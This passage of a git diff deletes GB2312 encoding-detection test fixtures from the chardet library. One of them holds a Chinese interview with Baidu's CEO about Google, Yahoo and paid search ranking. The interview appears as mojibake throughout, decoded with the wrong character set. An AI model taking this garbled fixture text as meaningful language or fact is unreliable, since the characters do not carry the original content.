-¡¡¡¡ְמ:ָח¹ֻµֻֻׁק¿ֹׂװ׃ֳ½נַ®ְ´׳צµִ»°£¬ֳִַ´־¢ָם׃¦¸ֳַµׂ»²ֵ¶װ¡£µ¼ֹֿ´׃1994¡¢1995ִךµ®ֹת»¥ֱ×ֽרׂװְ´£¬´׃ְ´ֳ»׃׀ׂ»¸צֻֻׁקׂ‎ַזַׂע־×ַֻ®¶אֻשׂװֻ׳צµֳ÷ֳ£¬ֳ»׃׀ׂ»¸צױגׁשµְִ‎׳׃£¬´׃־¢ָםµ½÷ףְ´µִGoogle¡¢°¶ָ£¬ֳ»׃׀ׂ»¼ַַׂ®¶א²ֵ׳צ÷ֳµִ¡£¶¼ַׂע־×ֻ׳¨׳¢£¬ָֻ¥׳צױגׂ»¼‏ֲַי£¬ֻשׂװֻ³ֹ¹¦ֱֻ¡£ - -¡¡¡¡¼ַ:Googleװָ«ַעµִײ×ֳ¶ָָ·µ±ָ°¶ָׂ×´ף£¬ױגׁשֳַֻׂ²׃׀»ת»בװײ׀¹ת³ֹ־×ְֿ´ף¡£ - -¡¡¡¡ְמ:5ִךׂװַ°Yahooװײ׀¹תµֳִֶר±ָGoogleׂ×´ףµֳ¶א£¬װָ«ַעׂ²÷ֳ£¬װְֳ¹תׂ²÷ֳ¡£ֳִַ´ַ²»ַ¾ַֻֽµYahooׂ»¶¨׳צµֳ±ָGoogle÷ֳִ״?ױ‎÷ֳַֿא·´µִ¡£ֻשׂװ־ׂ¾ץµֳױזױ‎ײ״ׂ×µִַ׳¨׳¢¡£ - -¡¡¡¡¹״׃¾÷¼ֳֵֵ - -¡¡¡¡¼ַ:װ­ְ´3721»עױ²ֳ´ֻֻׁקֱ×ֳֻײ®ְאµִ£¬ֳַֻׂ²÷ֳֿסַ׳¨׳¢µִ׳צֻֻׁק¡£־ײֳ´ײ»׃׀°¶ִָ¹»³צְ´ִ״? - -¡¡¡¡ְמ:µ¼ֹֿ׳׀ֿ¸¿´ׂ»ֲַֿ²»ַµִ¡£»¹ַ¾ַֻֽµ¶ּ׀ֵ²ֳ´£¬׃׀÷¶א¶«־ק¶¼ַװֽ¬±׳צµִ¡£µ±ָ»־ׂײ¸µִ¿ֹ±ָµִ¹«ֻ¾¶¼׃¦¸ֳַֹֿ׀¹«ֻ¾£¬¾ַֽµ½ׂ»¶¨¹זִ£µִ£¬ָח¹ֻµ÷׀¡µִ¹«ֻ¾¾ֽ׳צׂ»¼‏ֲַיִַַ±ָ½ֿ³£¼µִ¡£µ«ַµ±¹«ֻ¾¹זִ£´ףµ½ׂ»¶¨³ּ¶ָµִ±÷ע£¬ֳַֻ¶¼ַװֽ¬±׳צ÷¶אֲַי¡£¶ר׳¨׀ִײֲײ¾ָ¥׳צׂ»¼‏ֲַי£¬׳צ÷ֳµִ¿ִֹ׀װ±ִָדֽ¬±׳צ÷¶אֲַיµִ¼¸ֲׂ×´ףµֳ¶א£¬ױגַ³£ְם¡£ - -¡¡¡¡¼ַ:°¶ָ2004ִך±ֶָנ2002ִךµִ׃×ױ²מ²»¶א¶אֱֻ10±¶´ן1370¶אֽעְֳװס£ִַײקׂ×װ­ׂע²ֳ´? - -¡¡¡¡ְמ:ײקׂ×ַ¾÷¼ֳֵֵ¡£ - -¡¡¡¡¼ַ:2002ִךµִ±÷ע°¶ָׁׂ¾­׃׀¾÷¼ֳֵֵױג¸צ׳צ·¨ֱֻ? - -¡¡¡¡ְמ:ׁׂ¾­׃׀ֱֻ¡£ - -¡¡¡¡¼ַ:µָ׃ֻµױג¸צִ£½ׁׂ¾­¶¨ֱֻ¡£ - -¡¡¡¡ְמ:¶װ¡£ - -¡¡¡¡¼ַ:¾÷¼ֳֵֵױ¼ִדֳַ׳ױָכµִ¶אֹ£¬־ׂ¿´¹‎ׂ»¸צ‎¾ַ80%¡£ - -¡¡¡¡ְמ:µ¼ֹֿ־ֳַֿׂײװ׳ק־×ׂ»¸צ¹«ײ¹«ֻ¾£¬־¨ׂ»ֽ¸ֲ¶µִ¾ַֻֽµֻש־½µִֽרֲחֶֽ¹דױג¿יµִױָכַ¶אֹ¡£µ¼ֹֽֿרֲחֶֽ¹דײקׂ×µִ¾ַֽ¾÷¼ֳֵֵ£¬µ«ַ־ֳֳַׂ»׃׀¹«¿×¹‎¾÷¼ֳֵֵ¾ּוַױ¼¶אֹ¡£ - -¡¡¡¡¼ַ:ֽרֲחֶֽ¹דִ״? - -¡¡¡¡ְמ:ֽרֲחֶֽ¹דµִ»°£¬ױג¸צױ׀¹ֹיְןֳז¶¼׃׀£¬׃¦¸ֳַ90%¶א¡£µ¼ֹֿ¾ַֽ90%¶אַֽרֲחֶֽ¹ד£¬»¹׃׀7%ַֻֻׁקָם¼‏£¬£ֲֿµִֶהֻױָכ¾ֽ·ַ³£·ַ³£׀¡ֱֻ¡£ - -¡¡¡¡¼ַ:³‎ֱֻ¾÷¼ֳֵֵֽג£¬°¶ַָ·ס׃׀׀ֲµְִָףװצ³₪µד? - -¡¡¡¡ְמ:־ָֿׂ־×¾÷¼ֳֵֵַׂ»¸צ·ַ³£÷ְֿם·ַ³£׃ֵ׀דµִִ£½¡£ֻ¿ֹׂװֳָ¹ד¸זµִֹּ¼ׂ÷¾«ָ·µ״ױׂµ½ֻµִ¿ֽ»§ַֻ­¡£־ׂ¾ץµֳױגַׂ»¸צ¸ןֳ׀װµִֹּׂµִ£½£¬ׂ²ַ·ַ³£׃׀ַ°ֽ¾µִ¡£ - -¡¡¡¡־ׂ¾ץµֳ׃¯ְִ£½²¢²»ַ´ף¼ֿׂכֿףµֳִִַ´ײ״ׂ×£¬¾÷¼ֳֵֵױג¸צ׃¯ְִ£½װײ׀¹ת¿ֹׂװֻµֳַ»׃׀׳¨ְ¿ֹׂװ±£»₪µִ£¬´ף¼ׂ¶¼¿ֹׂװָ¥¿½±´£¬´ף¼ׂ¶¼¿ֹׂװָ¥ׁ§ֿ°¡£µ«ױזױ‎ײ״ׂ×µִ²¢²»װױגְן£¬¶רװ׃ִדִ¹»־ׂ‎¶אֹ׃ֳ»§£¬װ׃ִדַ²»ַױזױ‎µִ¸ר׃ֳ»§ּבֹ‎ֱֻ¼ײµ£¬ױג¸צ²ֵַ׳מײ״ׂ×µִ¡£ - -¡¡¡¡¿לֻװצ³₪µ±ָ»ַֽ¨¹‎¾÷¼ֳֵֵױג¸צִ£½ֿװֿײ³צְ´µִ¡£¼ָָ»ױג¸צִ£½ׁׂ¾­±»ײ₪ֳקַׂ»¸צ÷ֳִ£½£¬־ֳַׂ°¶ָ¾ֽ׃¦¸ֳֽךָ«ֽ¶ָכװײ׀־ִֻֻׁקֹֿ£¬¶ר²»ַֿעֶהֻµִ·½ֳז·¢ױ¹¡£ - -¡¡¡¡¹״׃±¾ָֻ - -¡¡¡¡¼ַ:ִדּבµ½÷¶א´־׳¨׳¢¡£¸תִד׀װ¸ס׃׀¹״ֿµֲנ? - -¡¡¡¡ְמ:¶װ£¬־ׂױג¸צָֻ´׃ְ´¶¼ַױג¸צׁש׳׃£¬־ׂ¾ץµֳ־ׂײ®ֻשׂװִ¹»ײנ½¥װׂ»¸צֿµֽ³ְןֲ‎ֲ‎µ״ֶנְ´µִ»°£¬¾ַֽׂע־×־ׂ׳צµִ÷¶אֲַיֳ»׃׀ָֻױגֳ´׳¨׳¢µִָ¥׳צ¹‎£¬°ְ¨ֿסֻֻׁקױגׁשµִׂ»¸צ¼¼ץ£¬־ׂװ¶ֱ´ףׁ§µִ±÷ע£¬¶ֱµִ¾ַֽױג¸צ׳¨ׂµ¡£ - -¡¡¡¡¼ַ:²ֳ´׳¨ׂµ? - -¡¡¡¡ְמ:¾ַַֽי±¨ׁ§¡£ - -¡¡¡¡¼ַ:ִתװ±±´ףִמַי±¨ׁ§? - -¡¡¡¡ְמ:¶װ¶װ¶װ¡£ - -¡¡¡¡¼ַ:²»ַֽ¼י¹¹ְםׁ§ֲנ? - -¡¡¡¡ְמ:µ±±־ׂ½רױג¸צֿµµִ±÷ע£¬ױג¸צֿµ½׀ֽ¼י¹ׁ§ַי±¨ׁ§ֿµ¡£ֿײװ½׀׳צ׀ֵֿ¢¹ְםֿµ£¬ױג¸צֿµ׃׀ֱ½¸צ׳¨ׂµ£¬ׂ»¸צַ־ִ¿ֶ׳¨ׂµµִֽ¼י¹ׁ§׳¨ׂµ£¬ׂ»¸צְַם¿ֶµִַי±¨ׁ§׳¨ׂµ¡£ - -¡¡¡¡¼ַ:ׁ§µִ¶¼ַ²ֳ´? - -¡¡¡¡ְמ:ױג¸צ׳¨ׂµֶהµ׃׀÷´ףׂ»²¿·ײׁ§¿ֶ¶¼ַ½²¿ֶ¼¼ַי±¨¼לֻק£¬¼ֶֻד»ת¼לֻק£¬ָ«¶¼ַ½²¸תGoogleֿא¹״µִ¶«־ק¡£ִַ¸צ±÷עׁ§ױג¸צµִָֻ²»¶א¡£ - -¡¡¡¡¼ַ:ִדֳַ°א׃׀¶אֹ¸צׁ§ֹת? - -¡¡¡¡ְמ:־ֳַׂ°א׃׀40¸צָֻ¡£ - -¡¡¡¡¼ַ:ֿײװֳַֻ¸תֻֻׁקֳ»׃׀²ֳ´¹״ֿµֱֲֻנ? - -¡¡¡¡ְמ:¶װ£¬ֿײװ¼¸÷ץֳ»׃׀ָֻ»¹װ׳צְאֶֻµֲִַי¡£±¾ֹםׁ§µִָֻ¾ֽ²»¶א£¬¶רׁ§ֱֻµִ£¬׳מ÷ף¼ב³ײְֲֿ´µִ¾ֽ¸ֹ¸ֱֹֻ¡£¶ר־ׂ´׃1987ִךµ½±±´ףׂ»ײ±µ½ֿײװױגֳ´¶אִך£¬׳צµִ¾ֽײ»׃׀ױגׂ»¼‏ֲַי£¬ֳ»׃׀ְכ¿×¹‎ֻֻׁק¡£ - -¡¡¡¡¼ַ:ִת5ִךְ´׳מ´ףµִֵׂ÷¶ַ²ֳ´?׳מ´ףµִֿ£ַֽ²ֳ´? - -¡¡¡¡ְמ:׳מ´ףµִֵׂ÷¶ֳַ»׃׀ּ«¶אµִ±¼ה¸ת¼ָֻׂװׂ»ֶנ¡£־ֿׂ£ֽײ׀־ִ׳מ´ףµִֽרױ¾ױֶ־ױװײ׀¹תָֻײְן¡£ - -¡¡¡¡ְמׁו÷ך¼ע½י - -¡¡¡¡ְמׁו÷ך£¬1991ִך±ֿׂµ׃±±¾©´ףׁ§£¬ֻז÷ף¸°ְֳ¹ת²¼·¨ֲֵ¦װ¼ײֱ¢´ףׁ§ֽך³ֹ¼ֶֻד»ת¿ֶׁ§ֻ¶¿ׁ§־»¡£1999ִךµ׳£¬׀¯·חֿױֽ¶׳»״µ½±±¾©£¬´´½¨°¶ָ£¬׃ֳָ‎ִך±¼ה½«°¶ָ׳צ³ָֹ«ַע׳מ´ףµִײ׀־ִֻֻׁקׂ‎ַז¹«ֻ¾¡£2001ִך±»ְֶׁ¡־ס°ײ׀¹ת®´ף´´ׂµ׀ֲָס¡±ײ®ׂ»£¬2002ִךָ»ס׳½ל¡°IT®´ף·חװֶָֻ־ן¡±³ֶ÷ֵ¡£2003ִךµ¶‏¼¾¶ָ£¬°¶ָ׀²¼ָ«ֳז׃¯ְ¡£ִ¿ַ°£¬°¶ָµִ¾÷¼ֳֵֵ¿ֽ»§´ן3ֽע׃א¼ׂ¡£2005ִך8װֲ5ָױ£¬°¶ָװְֳ¹ת³ֹ¹¦ֹֿ׀£¬ֶה׀ײµׂ»¶ָ´ןµ½39.58ְֳׂװ×£¬400־»ְֿװ±¹₪ׂ»ׂ¹±©¸»¡£°¶ָCEOְמׁו÷ךִ¿ַ°ֹם¼־×9.06ְֳׂװס£(׳קױ£÷ ֿׁ² ) - -¡¡¡¡¹״׃Google
    -
    -¡¡¡¡¼ַ:°¶ָµִ¾÷ױש¶װײ°ְ¨3ְא£¬¹ת¼¹«ֻ¾ײ׀׳מײ×ֳµִַGoogle£¬Yahoo£¬ִתװץׁשְֶ¼ֳַֻ?
    -
    -¡¡¡¡ְמ:־ֳַׂ²»ַ²־ױױְֳ¹ת¹«ֻ¾»עױ±נµִ¹«ֻ¾£¬־ֳַׂױזױ‎ַ־×׃ֳ»§µִ׀טַףְ´·‏־סµִ¡£־ֳַׂ´׃־µ½׃׀µ½ֿײװ±ה³ָֹ«ַע׳מ´ףµִײ׀־ִֽרױ¾£¬־ֳַׂ׳צײ׀־ִֻֻׁקׂ‎ַזµ½ֿײװ£¬²»ִֻµ־ֳַׂ¿½±´±נָֻ£¬¶רַ־ֳַׂױזױ‎׳צµ½ְם½ג׀³¡£¬ְם½ג׃ֳ»§µ½µ׳װױׂ²ֳ´£¬װץֳ´ׁשֲת׳דֳַֻ׀טַף£¬ױגׁש²ִֵ¹»¸÷ֳµִ·¢ױ¹¡£ֻשׂװ־ֳַׂױ¸צ·‏־סµִ¹‎³ַּֽךָ«´׃׃ֳ»§½ַ¶ָ³צ·¢µִׂ»¸צ¹‎³ּ¡£
    -
    -¡¡¡¡¼ַ:Googleַ°¶ָµִ¹ֹ¶«£¬׃׀ָָֻֿ־×ִדֳַײ®¼ה׃׀׳ֵּ״±נ־¢ֳמµִ¹״ֿµ¡£
    -
    -¡¡¡¡ְמ:װ־ׂ¿´ְ´ׂ²ֳ»׃׀ֳִַ´¸´װ׃£¬ׂ»·½ֳזGoogle׳ק־×°¶ָµִׂ»¸צ¹ֹ¶«£¬¸תֶהֻ¹ֹ¶«ׂ»ׁשַׂ»¸צ¹ֹ¶«£¬µ«ֱםֽגׂ»·½ֳזֻ׃ײַ°¶ָµִ¾÷ױש¶װײ£¬ֻׂ²ּב¹©ײ׀־ִֻֻׁקׂ‎ַז£¬ױגֱ½¸צ²דֳז־ֳַׂ»¹ַ·ײµֳ÷¿×µִ¡£¾ַֽ´¦ְםױג¸צ¹״ֿµֹֿ¿ִֹ±ָֽג½חֿכֿףµִׂ×¼עµ¥¡£׳ק־×ׂ»¸צ¹ֹ¶«µִ»°£¬Google¿ֹׂװֻµַׂ»¸צ÷±»¶¯µִ¹ֹ¶«¡£ֻשׂװֻµֻ²¢²»¾­³£¸ת־ֳַׂ־ׂ»׀©ֲַי£¬»עױ½»ֱקׂ»׀©¿´·¨¡£
    -
    -¡¡¡¡¼ַ:µ½ִ¿ַ°־×ײ¹°¶ָ»¹ַֻµ±ָGoogleׂ×÷ֳ¡£ִתָֿ־×£¬¾ּו±םֿײװִִ·½ֳזִ״?
    -
    -¡¡¡¡ְמ:»¹ִַַ¾ה»°£¬־ׂ¾ץµֳַ׳¨׳¢¡£
    -
    -¡¡¡¡¼ַ:Googleׂ²÷׳¨׳¢¡£
    -
    -¡¡¡¡ְמ:ֻ׳צׂ»°¶אײײ׃ןׁװׁ½¡£־ׂ¾ֽ׳צׂ»ײײ׃ןׁװ¡£¶רַֻׂ׳צE¡×mail£¬ָֻ¥׳צֻֻׁק£¬»¹׃׀²©¿ֽ²ֳ´µִ£¬ֻװ׳צ÷¶א¶«־ק¡£µ¼ֹֿװׂ»¸צ¸ֻ³ֹ³₪µֱִל׃ע£¬־ׂ¾ץµֳ׳¨׳¢ַ·ַ³£ײ״ׂ×µִ¡£
    -
    -¡¡¡¡¼ַ:׃׀ָֻֻµ°¶ָװׂ»ִךׂװ÷ף½«³¬¹‎Google¡£
    -
    -¡¡¡¡ְמ:ׂע־×־ַֹֿׂ׀¹«ֻ¾£¬־ַׂ²»ִ¹»װ₪²ג־´ְ´µִ£¬־ׂײ»ִֻµֿײװַ²ֳ´ׁש׳׃£¬־ׂײ»ִֻµֲµַ²ֳ´ׁש׳׃£¬ֲµ¾ַֽ°¶ַָָ«ַע׳מ´ףµִײ׀־ִֽרױ¾¡£
    -
    -¡¡¡¡¼ַ:Googleַׂ»¸צ´¿´גµְֳִ¹ת¹«ֻ¾£¬°¶ָµִֹֿ׀¸תֳַַֻװֽ¬ׂ»ֶנֵֹֿֿ?
    -
    -¡¡¡¡ְמׁו÷ך:¶װ¡£¾ַֽ־ֳַׂµ½ֱֻ¹ת¼׳±¾׀³¡ױזױ‎µִ׳נײ״¡£ׂװַ°µִײ׀¹ת¹«ֻ¾£¬´ף¼ׂׂ²ֵ׳ֵָ¥ֹֿ׀£¬¿ִַֹד׳מ÷ףׂ»ֻד¹ֹ¼£¬¸תְֳ¹ת¹«ֻ¾ֿא±ָ¶¼ַµֱֻֽ÷¶א£¬¾ַֻֽ­ׂ²ֻµ²»ַו³‏ַ־ײֳ´?ׂע־×ִדײ׀¹תֲפ²תֶ·ׂ²÷ֳ£¬ײ»ׂ×ַײ׀¹תײֶװל£¬ִד¾ֽ׃¦¸ֳ±דֻׂ¡£ָֿ²»¹ִדײֱ¿÷ֳ²»÷ֳ£¬ִדַײ׀¹תײֶװלµִ£¬ֻשׂװִדׂ×±דֻׂ¡£ֳִַ´ױג¸צ¹ֶֹ±ׂ²ַ£¬ִדַײ׀¹תְ´µִ»¥ֱ×ֽר¹«ֻ¾£¬ֻשׂװִדׂ×±דֻׂ¡£ׂװַ°µִ20¶א¼ֹֿׂ׀¹«ֻ¾¸רָֻµִ׃¡ֿף¶¼ַױגׁשµִ¡£ֳִַ´־ׂ¾ץµֳ°¶ָµִֹֿ׀׳צµ½ֱֻװֽ¬ׂ»ֶנֵֹֿֿ¡£
    -
    -¡¡¡¡¼ַ:Google׃׀÷¶אµִַ®£¬ױגַֻ³ֹ¹¦µִ¹״¼ֲנ?
    -
    -¡¡¡¡ְמ:ָח¹ֻµֻֻׁק¿ֹׂװ׃ֳ½נַ®ְ´׳צµִ»°£¬ֳִַ´־¢ָם׃¦¸ֳַµׂ»²ֵ¶װ¡£µ¼ֹֿ´׃1994¡¢1995ִךµ®ֹת»¥ֱ×ֽרׂװְ´£¬´׃ְ´ֳ»׃׀ׂ»¸צֻֻׁקׂ‎ַזַׂע־×ַֻ®¶אֻשׂװֻ׳צµֳ÷ֳ£¬ֳ»׃׀ׂ»¸צױגׁשµְִ‎׳׃£¬´׃־¢ָםµ½÷ףְ´µִGoogle¡¢°¶ָ£¬ֳ»׃׀ׂ»¼ַַׂ®¶א²ֵ׳צ÷ֳµִ¡£¶¼ַׂע־×ֻ׳¨׳¢£¬ָֻ¥׳צױגׂ»¼‏ֲַי£¬ֻשׂװֻ³ֹ¹¦ֱֻ¡£
    -
    -¡¡¡¡¼ַ:Googleװָ«ַעµִײ×ֳ¶ָָ·µ±ָ°¶ָׂ×´ף£¬ױגׁשֳַֻׂ²׃׀»ת»בװײ׀¹ת³ֹ־×ְֿ´ף¡£
    -
    -¡¡¡¡ְמ:5ִךׂװַ°Yahooװײ׀¹תµֳִֶר±ָGoogleׂ×´ףµֳ¶א£¬װָ«ַעׂ²÷ֳ£¬װְֳ¹תׂ²÷ֳ¡£ֳִַ´ַ²»ַ¾ַֻֽµYahooׂ»¶¨׳צµֳ±ָGoogle÷ֳִ״?ױ‎÷ֳַֿא·´µִ¡£ֻשׂװ־ׂ¾ץµֳױזױ‎ײ״ׂ×µִַ׳¨׳¢¡£
    -
    -¡¡¡¡¹״׃¾÷¼ֳֵֵ
    -
    -¡¡¡¡¼ַ:װ­ְ´3721»עױ²ֳ´ֻֻׁקֱ×ֳֻײ®ְאµִ£¬ֳַֻׂ²÷ֳֿסַ׳¨׳¢µִ׳צֻֻׁק¡£־ײֳ´ײ»׃׀°¶ִָ¹»³צְ´ִ״?
    -
    -¡¡¡¡ְמ:µ¼ֹֿ׳׀ֿ¸¿´ׂ»ֲַֿ²»ַµִ¡£»¹ַ¾ַֻֽµ¶ּ׀ֵ²ֳ´£¬׃׀÷¶א¶«־ק¶¼ַװֽ¬±׳צµִ¡£µ±ָ»־ׂײ¸µִ¿ֹ±ָµִ¹«ֻ¾¶¼׃¦¸ֳַֹֿ׀¹«ֻ¾£¬¾ַֽµ½ׂ»¶¨¹זִ£µִ£¬ָח¹ֻµ÷׀¡µִ¹«ֻ¾¾ֽ׳צׂ»¼‏ֲַיִַַ±ָ½ֿ³£¼µִ¡£µ«ַµ±¹«ֻ¾¹זִ£´ףµ½ׂ»¶¨³ּ¶ָµִ±÷ע£¬ֳַֻ¶¼ַװֽ¬±׳צ÷¶אֲַי¡£¶ר׳¨׀ִײֲײ¾ָ¥׳צׂ»¼‏ֲַי£¬׳צ÷ֳµִ¿ִֹ׀װ±ִָדֽ¬±׳צ÷¶אֲַיµִ¼¸ֲׂ×´ףµֳ¶א£¬ױגַ³£ְם¡£
    -
    -¡¡¡¡¼ַ:°¶ָ2004ִך±ֶָנ2002ִךµִ׃×ױ²מ²»¶א¶אֱֻ10±¶´ן1370¶אֽעְֳװס£ִַײקׂ×װ­ׂע²ֳ´?
    -
    -¡¡¡¡ְמ:ײקׂ×ַ¾÷¼ֳֵֵ¡£
    -
    -¡¡¡¡¼ַ:2002ִךµִ±÷ע°¶ָׁׂ¾­׃׀¾÷¼ֳֵֵױג¸צ׳צ·¨ֱֻ?
    -
    -¡¡¡¡ְמ:ׁׂ¾­׃׀ֱֻ¡£
    -
    -¡¡¡¡¼ַ:µָ׃ֻµױג¸צִ£½ׁׂ¾­¶¨ֱֻ¡£
    -
    -¡¡¡¡ְמ:¶װ¡£
    -
    -¡¡¡¡¼ַ:¾÷¼ֳֵֵױ¼ִדֳַ׳ױָכµִ¶אֹ£¬־ׂ¿´¹‎ׂ»¸צ‎¾ַ80%¡£
    -
    -¡¡¡¡ְמ:µ¼ֹֿ־ֳַֿׂײװ׳ק־×ׂ»¸צ¹«ײ¹«ֻ¾£¬־¨ׂ»ֽ¸ֲ¶µִ¾ַֻֽµֻש־½µִֽרֲחֶֽ¹דױג¿יµִױָכַ¶אֹ¡£µ¼ֹֽֿרֲחֶֽ¹דײקׂ×µִ¾ַֽ¾÷¼ֳֵֵ£¬µ«ַ־ֳֳַׂ»׃׀¹«¿×¹‎¾÷¼ֳֵֵ¾ּוַױ¼¶אֹ¡£
    -
    -¡¡¡¡¼ַ:ֽרֲחֶֽ¹דִ״?
    -
    -¡¡¡¡ְמ:ֽרֲחֶֽ¹דµִ»°£¬ױג¸צױ׀¹ֹיְןֳז¶¼׃׀£¬׃¦¸ֳַ90%¶א¡£µ¼ֹֿ¾ַֽ90%¶אַֽרֲחֶֽ¹ד£¬»¹׃׀7%ַֻֻׁקָם¼‏£¬£ֲֿµִֶהֻױָכ¾ֽ·ַ³£·ַ³£׀¡ֱֻ¡£
    -
    -¡¡¡¡¼ַ:³‎ֱֻ¾÷¼ֳֵֵֽג£¬°¶ַָ·ס׃׀׀ֲµְִָףװצ³₪µד?
    -
    -¡¡¡¡ְמ:־ָֿׂ־×¾÷¼ֳֵֵַׂ»¸צ·ַ³£÷ְֿם·ַ³£׃ֵ׀דµִִ£½¡£ֻ¿ֹׂװֳָ¹ד¸זµִֹּ¼ׂ÷¾«ָ·µ״ױׂµ½ֻµִ¿ֽ»§ַֻ­¡£־ׂ¾ץµֳױגַׂ»¸צ¸ןֳ׀װµִֹּׂµִ£½£¬ׂ²ַ·ַ³£׃׀ַ°ֽ¾µִ¡£
    -
    -¡¡¡¡־ׂ¾ץµֳ׃¯ְִ£½²¢²»ַ´ף¼ֿׂכֿףµֳִִַ´ײ״ׂ×£¬¾÷¼ֳֵֵױג¸צ׃¯ְִ£½װײ׀¹ת¿ֹׂװֻµֳַ»׃׀׳¨ְ¿ֹׂװ±£»₪µִ£¬´ף¼ׂ¶¼¿ֹׂװָ¥¿½±´£¬´ף¼ׂ¶¼¿ֹׂװָ¥ׁ§ֿ°¡£µ«ױזױ‎ײ״ׂ×µִ²¢²»װױגְן£¬¶רװ׃ִדִ¹»־ׂ‎¶אֹ׃ֳ»§£¬װ׃ִדַ²»ַױזױ‎µִ¸ר׃ֳ»§ּבֹ‎ֱֻ¼ײµ£¬ױג¸צ²ֵַ׳מײ״ׂ×µִ¡£
    -
    -¡¡¡¡¿לֻװצ³₪µ±ָ»ַֽ¨¹‎¾÷¼ֳֵֵױג¸צִ£½ֿװֿײ³צְ´µִ¡£¼ָָ»ױג¸צִ£½ׁׂ¾­±»ײ₪ֳקַׂ»¸צ÷ֳִ£½£¬־ֳַׂ°¶ָ¾ֽ׃¦¸ֳֽךָ«ֽ¶ָכװײ׀־ִֻֻׁקֹֿ£¬¶ר²»ַֿעֶהֻµִ·½ֳז·¢ױ¹¡£
    -
    -¡¡¡¡¹״׃±¾ָֻ
    -
    -¡¡¡¡¼ַ:ִדּבµ½÷¶א´־׳¨׳¢¡£¸תִד׀װ¸ס׃׀¹״ֿµֲנ?
    -
    -¡¡¡¡ְמ:¶װ£¬־ׂױג¸צָֻ´׃ְ´¶¼ַױג¸צׁש׳׃£¬־ׂ¾ץµֳ־ׂײ®ֻשׂװִ¹»ײנ½¥װׂ»¸צֿµֽ³ְןֲ‎ֲ‎µ״ֶנְ´µִ»°£¬¾ַֽׂע־×־ׂ׳צµִ÷¶אֲַיֳ»׃׀ָֻױגֳ´׳¨׳¢µִָ¥׳צ¹‎£¬°ְ¨ֿסֻֻׁקױגׁשµִׂ»¸צ¼¼ץ£¬־ׂװ¶ֱ´ףׁ§µִ±÷ע£¬¶ֱµִ¾ַֽױג¸צ׳¨ׂµ¡£
    -
    -¡¡¡¡¼ַ:²ֳ´׳¨ׂµ?
    -
    -¡¡¡¡ְמ:¾ַַֽי±¨ׁ§¡£
    -
    -¡¡¡¡¼ַ:ִתװ±±´ףִמַי±¨ׁ§?
    -
    -¡¡¡¡ְמ:¶װ¶װ¶װ¡£
    -
    -¡¡¡¡¼ַ:²»ַֽ¼י¹¹ְםׁ§ֲנ?
    -
    -¡¡¡¡ְמ:µ±±־ׂ½רױג¸צֿµµִ±÷ע£¬ױג¸צֿµ½׀ֽ¼י¹ׁ§ַי±¨ׁ§ֿµ¡£ֿײװ½׀׳צ׀ֵֿ¢¹ְםֿµ£¬ױג¸צֿµ׃׀ֱ½¸צ׳¨ׂµ£¬ׂ»¸צַ־ִ¿ֶ׳¨ׂµµִֽ¼י¹ׁ§׳¨ׂµ£¬ׂ»¸צְַם¿ֶµִַי±¨ׁ§׳¨ׂµ¡£
    -
    -¡¡¡¡¼ַ:ׁ§µִ¶¼ַ²ֳ´?
    -
    -¡¡¡¡ְמ:ױג¸צ׳¨ׂµֶהµ׃׀÷´ףׂ»²¿·ײׁ§¿ֶ¶¼ַ½²¿ֶ¼¼ַי±¨¼לֻק£¬¼ֶֻד»ת¼לֻק£¬ָ«¶¼ַ½²¸תGoogleֿא¹״µִ¶«־ק¡£ִַ¸צ±÷עׁ§ױג¸צµִָֻ²»¶א¡£
    -
    -¡¡¡¡¼ַ:ִדֳַ°א׃׀¶אֹ¸צׁ§ֹת?
    -
    -¡¡¡¡ְמ:־ֳַׂ°א׃׀40¸צָֻ¡£
    -
    -¡¡¡¡¼ַ:ֿײװֳַֻ¸תֻֻׁקֳ»׃׀²ֳ´¹״ֿµֱֲֻנ?
    -
    -¡¡¡¡ְמ:¶װ£¬ֿײװ¼¸÷ץֳ»׃׀ָֻ»¹װ׳צְאֶֻµֲִַי¡£±¾ֹםׁ§µִָֻ¾ֽ²»¶א£¬¶רׁ§ֱֻµִ£¬׳מ÷ף¼ב³ײְֲֿ´µִ¾ֽ¸ֹ¸ֱֹֻ¡£¶ר־ׂ´׃1987ִךµ½±±´ףׂ»ײ±µ½ֿײװױגֳ´¶אִך£¬׳צµִ¾ֽײ»׃׀ױגׂ»¼‏ֲַי£¬ֳ»׃׀ְכ¿×¹‎ֻֻׁק¡£
    -
    -¡¡¡¡¼ַ:ִת5ִךְ´׳מ´ףµִֵׂ÷¶ַ²ֳ´?׳מ´ףµִֿ£ַֽ²ֳ´?
    -
    -¡¡¡¡ְמ:׳מ´ףµִֵׂ÷¶ֳַ»׃׀ּ«¶אµִ±¼ה¸ת¼ָֻׂװׂ»ֶנ¡£־ֿׂ£ֽײ׀־ִ׳מ´ףµִֽרױ¾ױֶ־ױװײ׀¹תָֻײְן¡£
    -
    -¡¡¡¡ְמׁו÷ך¼ע½י
    -
    -¡¡¡¡ְמׁו÷ך£¬1991ִך±ֿׂµ׃±±¾©´ףׁ§£¬ֻז÷ף¸°ְֳ¹ת²¼·¨ֲֵ¦װ¼ײֱ¢´ףׁ§ֽך³ֹ¼ֶֻד»ת¿ֶׁ§ֻ¶¿ׁ§־»¡£1999ִךµ׳£¬׀¯·חֿױֽ¶׳»״µ½±±¾©£¬´´½¨°¶ָ£¬׃ֳָ‎ִך±¼ה½«°¶ָ׳צ³ָֹ«ַע׳מ´ףµִײ׀־ִֻֻׁקׂ‎ַז¹«ֻ¾¡£2001ִך±»ְֶׁ¡־ס°ײ׀¹ת®´ף´´ׂµ׀ֲָס¡±ײ®ׂ»£¬2002ִךָ»ס׳½ל¡°IT®´ף·חװֶָֻ־ן¡±³ֶ÷ֵ¡£2003ִךµ¶‏¼¾¶ָ£¬°¶ָ׀²¼ָ«ֳז׃¯ְ¡£ִ¿ַ°£¬°¶ָµִ¾÷¼ֳֵֵ¿ֽ»§´ן3ֽע׃א¼ׂ¡£2005ִך8װֲ5ָױ£¬°¶ָװְֳ¹ת³ֹ¹¦ֹֿ׀£¬ֶה׀ײµׂ»¶ָ´ןµ½39.58ְֳׂװ×£¬400־»ְֿװ±¹₪ׂ»ׂ¹±©¸»¡£°¶ָCEOְמׁו÷ךִ¿ַ°ֹם¼־×9.06ְֳׂװס£(׳קױ£÷ ֿׁ² )]]>
    -
    -
    diff --git a/chardet/tests/GB2312/254.blog.westca.com.xml b/chardet/tests/GB2312/254.blog.westca.com.xml deleted file mode 100644 index 863a35e..0000000 --- a/chardet/tests/GB2312/254.blog.westca.com.xml +++ /dev/null @@ -1,84 +0,0 @@ - - - - - ÷ת²»¹י»­ְָ - http://blog.westca.com/blog_ zhalimuto/index.html - 